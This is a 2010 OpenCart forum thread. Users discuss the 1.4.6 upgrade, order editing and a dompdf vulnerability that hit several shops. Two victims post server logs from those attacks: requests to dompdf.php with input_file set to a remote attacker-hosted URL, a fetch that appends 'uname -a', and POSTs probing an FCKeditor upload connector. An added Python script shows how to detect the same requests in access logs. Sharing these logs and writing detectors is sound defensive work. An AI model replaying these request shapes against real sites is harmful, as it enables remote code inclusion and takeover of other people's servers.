Post by fido-x » Thu Apr 08, 2010 11:48 am

Qphoria wrote: You wrote it, I read it
Yeah, but you obviously didn't understand it.

Modules for OpenCart 2.3.0.2
Homepage Module [Free - since OpenCart 0.7.7]
Multistore Extensions
Store Manager Multi-Vendor/Multi-Store management tool

If you're not living on the edge ... you're taking up too much space!

Expert Member
Joined Sat Jun 28, 2008 1:09 am
Location - Tasmania, Australia

Post by Qphoria » Thu Apr 08, 2010 12:01 pm

Or you obviously wrote it wrong?

Administrator
Joined Tue Jul 22, 2008 3:02 am

Post by i2Paq » Thu Apr 08, 2010 12:34 pm

fido-x wrote: In OpenCart, this just means deleting "system/helper/dompdf/dompdf.php". Since my own contributions in this area (PDF viewer for OC versions 1.3.2 and 1.3.4) already use the class directly, they will continue to work with the "dompdf.php" file removed.
Qphoria wrote: Just delete the damn folder
Guys!

You are not talking about the same thing so that is where the confusion starts!

The folder needs to be there, only the "dompdf.php" file needs to be removed.

Norman in 't Veldt
Moderator OpenCart Forums

_________________ READ and Search BEFORE POSTING _________________

Our FREE search: Find your answer FAST!.

[How to] BTW + Verzend + betaal setup.

Global Moderator
Joined Mon Nov 09, 2009 7:00 pm
Location - Winkel - The Netherlands

Post by Qphoria » Thu Apr 08, 2010 7:32 pm

Is there a new version that fixes this?
I went to the dompdf site and it looks like nobody has any conversations about it.
http://www.digitaljunkies.ca/dompdf/
http://code.google.com/p/dompdf/issues/list

Actually, in Google when I search "dompdf vulnerability" I find only articles from Feb 2009, and there was a one-line fix for it.

I see there is dompdf 6.0 beta out, but not sure how useful that is at this point.

Administrator
Joined Tue Jul 22, 2008 3:02 am

Post by 12oclocker » Sat Apr 10, 2010 1:13 am

First let me say I love open cart, and want to see it succeed beyond the other carts out there, but I downgraded back to 1.4.0 for a few reasons, please think of these comments as constructive recommendations....

I copied my database, and upgraded from 1.4.0 to 1.4.6,
but then downgraded back to 1.4.0 for a few big reasons...

1) I can no longer copy addresses into Endicia's shipping program for quick and easy shipping (main reason).
This is the biggest reason I had to downgrade. It would increase my shipping time by at least 10x every day. One copy and paste for every order is much, much better than 9 copy and paste actions for every order. When shipping a lot of orders this really starts to slow you down big time.
2) Cannot edit invoices to make changes on errored orders, such as price changes.
3) Cannot change or void an invoice and have the cost deducted from the sales statistics.

for a single store user I don't see any benefit in the 1.4.6 upgrade
I may actually spend some time writing these features into version 1.4.0, since everything else on that version is excellent.



...Address format is no longer shipping friendly ...
Joe Smith
200 Cherry Lane
New York, NY, 13110

...it's now a line by line thing, no longer compatible with any copy/paste shipping programs....
First Name: Joe
Last Name: Smith
Company:
Address 1: 200 Cherry Lane
City: New York
Post Code: 13110
Region / State: New York
Region / State Code: NY
Country: United States

Active Member
Joined Fri Feb 19, 2010 10:50 am

Post by i2Paq » Sat Apr 10, 2010 1:50 am

12oclocker wrote: ...Address format is no longer shipping friendly ...
Joe Smith
200 Cherry Lane
New York, NY, 13110

...it's now a line by line thing, no longer compatible with any copy/paste shipping programs....
First Name: Joe
Last Name: Smith
Company:
Address 1: 200 Cherry Lane
City: New York
Post Code: 13110
Region / State: New York
Region / State Code: NY
Country: United States
This you can set yourself in the BO of 1.4.6:

Configuration -> Settings -> Country's -> Country

Norman in 't Veldt
Moderator OpenCart Forums

Global Moderator
Joined Mon Nov 09, 2009 7:00 pm
Location - Winkel - The Netherlands

Post by Johnathan » Sat Apr 10, 2010 4:33 am

12oclocker wrote:...Address format is no longer shipping friendly ...
Joe Smith
200 Cherry Lane
New York, NY, 13110

...it's now a line by line thing, no longer compatible with any copy/paste shipping programs....
First Name: Joe
Last Name: Smith
Company:
Address 1: 200 Cherry Lane
City: New York
Post Code: 13110
Region / State: New York
Region / State Code: NY
Country: United States
I agree with 12oclocker that the 1.4.0 way of addressing is much better than the 1.4.6 way.

Administrator
Joined Fri Dec 18, 2009 3:08 am


Post by i2Paq » Sat Apr 10, 2010 5:11 am

Johnathan wrote: I agree with 12oclocker that the 1.4.0 way of addressing is much better than the 1.4.6 way.
I believe they were the same...

Norman in 't Veldt
Moderator OpenCart Forums

Global Moderator
Joined Mon Nov 09, 2009 7:00 pm
Location - Winkel - The Netherlands

Post by Johnathan » Sat Apr 10, 2010 11:36 am

12oclocker was talking about the way addresses are displayed in Orders. In 1.4.6 they are separated by lines (i.e. in different <td> tags) instead of all together like in 1.4.0 (i.e. in one <td> tag). Since they're in different <td> tags, you can't copy and paste the whole address at once. It all boils down to the new design of the Order page, which seems not as user-friendly.

Administrator
Joined Fri Dec 18, 2009 3:08 am


Post by Qphoria » Sat Apr 10, 2010 8:38 pm

12oclocker wrote: 1) I can no longer copy addresses into Endicia's shipping program for quick and easy shipping (main reason).
This is the biggest reason I had to downgrade. It would increase my shipping time by at least 10x every day. One copy and paste for every order is much, much better than 9 copy and paste actions for every order. When shipping a lot of orders this really starts to slow you down big time.
I know where you are coming from for this. I used to use my own script that would send to usps by just copying the whole address. You should still be able to copy/paste the old way if you click the "Invoice" button at the top of the order page. Have you tried that?

Administrator
Joined Tue Jul 22, 2008 3:02 am

Post by Johnathan » Sat Apr 10, 2010 10:54 pm

Qphoria wrote: I know where you are coming from for this. I used to use my own script that would send to usps by just copying the whole address. You should still be able to copy/paste the old way if you click the "Invoice" button at the top of the order page. Have you tried that?
Ah, good idea. I've tested it, that works fine.

Administrator
Joined Fri Dec 18, 2009 3:08 am


Post by 12oclocker » Sun Apr 11, 2010 7:53 am

Qphoria wrote: I know where you are coming from for this. I used to use my own script that would send to usps by just copying the whole address. You should still be able to copy/paste the old way if you click the "Invoice" button at the top of the order page. Have you tried that?
That's a solution. I'll probably stick with 1.4.0 for now. The big feature I was hoping for was the ability to edit orders; order editing capability is a critical must for any real business, and I was hoping 1.4.6 was going to have it. I am going to write some though, so once I write it I'll post it up. That's a huge priority for me right now, I just don't have any time to do it at the moment. I definitely need a way to edit and void orders so that it reflects correctly on the statistics, very important for end of year tax time. If I don't have accurate records I'll get nailed, and I really don't want to keep paper records, so the statistic thing is a cool feature; I just need to code a way to make it accurate, because as it stands, I cannot alter an order in the system once it's placed, and I get at least 1 altered order per week, so this becomes a problem. I wish there were 32 hours in a day. I could get a lot more done. All in all though OpenCart is better than everything else I have tried, very cool. It will be a total solution once order editing is introduced.

Active Member
Joined Fri Feb 19, 2010 10:50 am

Post by Qphoria » Sun Apr 11, 2010 8:18 am

planned for 1.4.8

Administrator
Joined Tue Jul 22, 2008 3:02 am

Post by 12oclocker » Thu Apr 15, 2010 11:29 pm

awesome.....


I did get hit with the dompdf library vulnerability today!! It is real. I fixed it though, everything is OK now.

Active Member
Joined Fri Feb 19, 2010 10:50 am

Post by Geo » Fri Apr 16, 2010 12:28 pm

Got hit by hackers. Injection of an iframe in the footer.tpl file. It is not true that only dom.php is vulnerable: see here

[23-Mar-2010 03:05:17] PHP Warning:  file_get_contents(http://66.181.240.100/~ches/go/195753.txt?x=uname -a) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found
 in /home/user/public_html/store/system/helper/dompdf/include/dompdf.cls.php on line 261
[23-Mar-2010 03:06:08] PHP Fatal error:  Uncaught exception 'DOMPDF_Exception' with message 'Requested HTML document contains no data.' in /home/user/public_html/store/system/helper/dompdf/include/frame_tree.cls.php:135
Stack trace:
#0 /home/user/public_html/store/system/helper/dompdf/include/dompdf.cls.php(293): Frame_Tree->build_tree()
#1 /home/user/public_html/store/system/helper/dompdf/include/dompdf.cls.php(377): DOMPDF->_process_html()
#2 /home/user/public_html/store/system/helper/dompdf/dompdf.php(275): DOMPDF->render()
#3 {main}
  thrown in /home/user/public_html/store/system/helper/dompdf/include/frame_tree.cls.php on line 135

So for admins: make sure the dompdf folder is deleted, but DO NOT delete system/helper/image.php ;)
Also: Did you guys have any problems with fckeditor:

94.228.220.68 - - [11/Apr/2010:12:13:15 +0300] "GET /store/system/helper/dompdf/dompdf.php?input_file=http://musorka.cn.zp.ua/cfg/conf.txt HTTP/1.1" 200 33 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51"
94.228.220.68 - - [11/Apr/2010:12:13:13+0300] "POST /store/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 276 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51"
How can it be secured? After uploading a site can it be deleted?

Geo
Newbie
Joined Fri Apr 09, 2010 4:42 pm


Post by Qphoria » Fri Apr 16, 2010 7:25 pm

Thanks for the info.

Administrator
Joined Tue Jul 22, 2008 3:02 am

Post by 12oclocker » Fri Apr 16, 2010 9:05 pm

Yeah, I deleted everything inside of the dompdf folder, I didn't want to take a chance ;D

Active Member
Joined Fri Feb 19, 2010 10:50 am

Post by dbellinzani » Sat Apr 17, 2010 8:30 pm

Ciao,
if someone wants to study the IP ... here is my log ...

94.228.220.68 - - [11/Apr/2010:12:40:53 +0200] "POST /admin/view/javascript/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 200 309 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51"
94.228.220.68 - - [11/Apr/2010:12:40:55 +0200] "GET /system/helper/dompdf/dompdf.php?input_file=http://musorka.cn.zp.ua/cfg/conf.txt HTTP/1.1" 200 33 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51"

Daniele

Newbie
Joined Wed Oct 07, 2009 11:18 pm
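Added example for the two posts above (Geo's and dbellinzani's logs); this is editor-added code, not from any poster and not part of OpenCart. It scans combined-format access log lines for the two request shapes both admins posted: a GET to dompdf.php whose input_file parameter points at a remote URL, and a POST to the FCKeditor file-manager upload connector. The sample lines are the four posted in the thread plus one constructed benign admin request; the rule names, the script_present field and the grouping by source IP are my own choices, not anything the thread defines.

```python
"""Flag the request patterns seen in the thread's posted access logs.

Editor-added example (not OpenCart code, not any poster's script).
Assumes Apache/nginx combined log format.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# One combined-format access log line. The timestamp group tolerates the
# missing space before the timezone seen in one of the posted lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Prefixes that make input_file fetch something other than a local file
# (the posted lines use http://; the other wrappers are assumed extras).
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "php://", "data:")


def classify(line):
    """Return the findings for one access-log line (empty list when nothing matched)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    path = parts.path.lower()
    status = int(m.group("status"))
    base = {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": status,
        # 200 means the script was still there to answer; 404 means the probe missed.
        "script_present": status == 200,
    }
    findings = []
    if path.endswith("/dompdf/dompdf.php"):
        values = parse_qs(parts.query).get("input_file", [])
        if any(v.lower().startswith(REMOTE_PREFIXES) for v in values):
            findings.append(dict(base, rule="dompdf_remote_input_file"))
    if m.group("method") == "POST" and "/fckeditor/editor/filemanager/connectors/" in path:
        findings.append(dict(base, rule="fckeditor_connector_post"))
    return findings


def scan(lines):
    """Group findings by source IP so one scanner shows up as one entry."""
    by_ip = defaultdict(list)
    for line in lines:
        for finding in classify(line):
            by_ip[finding["ip"]].append(finding)
    return dict(by_ip)


# Sample input: the four lines posted in the thread (same source IP against two
# shops) plus one constructed benign line for an admin viewing an invoice.
SAMPLE_LOG = [
    '94.228.220.68 - - [11/Apr/2010:12:13:15 +0300] "GET /store/system/helper/dompdf/dompdf.php?input_file=http://musorka.cn.zp.ua/cfg/conf.txt HTTP/1.1" 200 33 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51"',
    '94.228.220.68 - - [11/Apr/2010:12:13:13+0300] "POST /store/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 276 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51"',
    '94.228.220.68 - - [11/Apr/2010:12:40:53 +0200] "POST /admin/view/javascript/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 200 309 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51"',
    '94.228.220.68 - - [11/Apr/2010:12:40:55 +0200] "GET /system/helper/dompdf/dompdf.php?input_file=http://musorka.cn.zp.ua/cfg/conf.txt HTTP/1.1" 200 33 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51"',
    # Constructed benign line (not from the thread).
    '192.0.2.10 - - [11/Apr/2010:13:00:00 +0200] "GET /admin/index.php?route=sale/order/invoice&order_id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip)
        for h in hits:
            print(f"  {h['ts']}  {h['rule']:<26} status={h['status']} script_present={h['script_present']}")
```

Run against a real log with `scan(open(path).read().splitlines())`. The status code is the useful triage bit: Geo's connector POST came back 404 (the connector was not there), dbellinzani's came back 200 (it was), and both dompdf requests returned 200, which is the "delete dompdf.php" advice above measured from the outside. A further point the PHP warning in Geo's post shows is that `file_get_contents()` was handed an http:// URL, which only works when PHP's allow_url_fopen is on; that setting is worth checking alongside removing the file.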

Post by Geo » Mon Apr 19, 2010 8:01 am

You're welcome, Qphoria. Thank you for the announcement for other users.

Geo
Newbie
Joined Fri Apr 09, 2010 4:42 pm
